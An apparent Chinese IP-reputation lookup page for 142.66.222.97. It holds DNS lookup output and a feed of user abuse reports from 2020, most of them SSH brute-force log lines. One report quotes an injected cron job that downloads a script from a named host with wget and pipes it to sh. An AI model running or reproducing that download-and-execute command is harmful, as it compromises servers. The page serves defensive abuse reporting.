必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Canada

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 142.66.222.97
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14662
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;142.66.222.97.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025021401 1800 900 604800 86400

;; Query time: 16 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Feb 15 06:29:07 CST 2025
;; MSG SIZE  rcvd: 106
HOST信息:
Host 97.222.66.142.in-addr.arpa. not found: 3(NXDOMAIN)
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 97.222.66.142.in-addr.arpa: NXDOMAIN
相关IP信息:
最新评论:
IP 类型 评论内容 时间
222.186.52.39 attack
May  8 14:09:38 marvibiene sshd[3081]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.52.39  user=root
May  8 14:09:40 marvibiene sshd[3081]: Failed password for root from 222.186.52.39 port 50944 ssh2
May  8 14:09:43 marvibiene sshd[3081]: Failed password for root from 222.186.52.39 port 50944 ssh2
May  8 14:09:38 marvibiene sshd[3081]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.52.39  user=root
May  8 14:09:40 marvibiene sshd[3081]: Failed password for root from 222.186.52.39 port 50944 ssh2
May  8 14:09:43 marvibiene sshd[3081]: Failed password for root from 222.186.52.39 port 50944 ssh2
...
2020-05-08 22:23:44
149.56.12.88 attackbotsspam
May  8 15:10:55 vpn01 sshd[14155]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=149.56.12.88
May  8 15:10:57 vpn01 sshd[14155]: Failed password for invalid user matt from 149.56.12.88 port 33608 ssh2
...
2020-05-08 21:56:26
138.68.94.142 attackbots
sshd: Failed password for root from 138.68.94.142 port 52542 ssh2
2020-05-08 21:53:35
195.3.146.118 attackbots
crontab of www-data user on server got injected with CRON[307188]: (www-data) CMD (wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1)
2020-05-08 22:09:25
129.28.181.103 attack
May  8 09:02:22 NPSTNNYC01T sshd[8410]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.28.181.103
May  8 09:02:24 NPSTNNYC01T sshd[8410]: Failed password for invalid user w from 129.28.181.103 port 49638 ssh2
May  8 09:08:37 NPSTNNYC01T sshd[8989]: Failed password for root from 129.28.181.103 port 58352 ssh2
...
2020-05-08 22:25:06
109.225.107.159 attackspam
Cowrie Honeypot: Unauthorised SSH/Telnet login attempt with user "ls" at 2020-05-08T13:55:36Z
2020-05-08 22:06:34
45.55.246.3 attackspam
May  8 15:56:37 [host] sshd[16712]: Invalid user i
May  8 15:56:37 [host] sshd[16712]: pam_unix(sshd:
May  8 15:56:39 [host] sshd[16712]: Failed passwor
2020-05-08 22:18:10
49.128.184.240 attackspambots
May 08 07:13:39 askasleikir sshd[4250]: Failed password for root from 49.128.184.240 port 60306 ssh2
2020-05-08 21:38:13
192.144.219.201 attackspam
2020-05-08T12:25:35.666201shield sshd\[9730\]: Invalid user lina from 192.144.219.201 port 39432
2020-05-08T12:25:35.669755shield sshd\[9730\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.144.219.201
2020-05-08T12:25:37.862390shield sshd\[9730\]: Failed password for invalid user lina from 192.144.219.201 port 39432 ssh2
2020-05-08T12:27:04.414811shield sshd\[10113\]: Invalid user marcom from 192.144.219.201 port 54404
2020-05-08T12:27:04.418928shield sshd\[10113\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.144.219.201
2020-05-08 22:22:20
220.76.205.35 attack
May  8 13:11:04 ip-172-31-61-156 sshd[3566]: Failed password for invalid user nie from 220.76.205.35 port 25658 ssh2
May  8 13:13:14 ip-172-31-61-156 sshd[3656]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=220.76.205.35  user=root
May  8 13:13:17 ip-172-31-61-156 sshd[3656]: Failed password for root from 220.76.205.35 port 41987 ssh2
May  8 13:15:21 ip-172-31-61-156 sshd[3758]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=220.76.205.35  user=root
May  8 13:15:23 ip-172-31-61-156 sshd[3758]: Failed password for root from 220.76.205.35 port 58317 ssh2
...
2020-05-08 22:07:18
80.211.97.251 attackbotsspam
sshd: Failed password for invalid user buyer from 80.211.97.251 port 57704 ssh2 (12 attempts)
2020-05-08 21:53:08
185.50.149.25 attack
Automatic report
2020-05-08 21:52:36
222.186.173.154 attackbots
May  8 15:48:36 minden010 sshd[30646]: Failed password for root from 222.186.173.154 port 46888 ssh2
May  8 15:48:39 minden010 sshd[30646]: Failed password for root from 222.186.173.154 port 46888 ssh2
May  8 15:48:43 minden010 sshd[30646]: Failed password for root from 222.186.173.154 port 46888 ssh2
May  8 15:48:46 minden010 sshd[30646]: Failed password for root from 222.186.173.154 port 46888 ssh2
...
2020-05-08 21:50:12
51.15.56.133 attack
sshd: Failed password for invalid user gitlab from 51.15.56.133 port 57910 ssh2 (14 attempts)
2020-05-08 22:25:40
141.98.80.69 attack
firewall detected
2020-05-08 22:19:55

最近上报的IP列表

118.90.53.192 34.56.188.164 173.225.253.189 74.28.126.117
62.161.163.58 100.232.148.206 6.132.223.200 140.227.151.232
57.1.252.209 8.186.4.70 130.250.203.35 76.149.158.152
5.65.82.76 225.79.40.70 79.214.229.54 77.154.98.245
36.235.236.132 24.156.213.130 68.234.1.244 13.144.217.99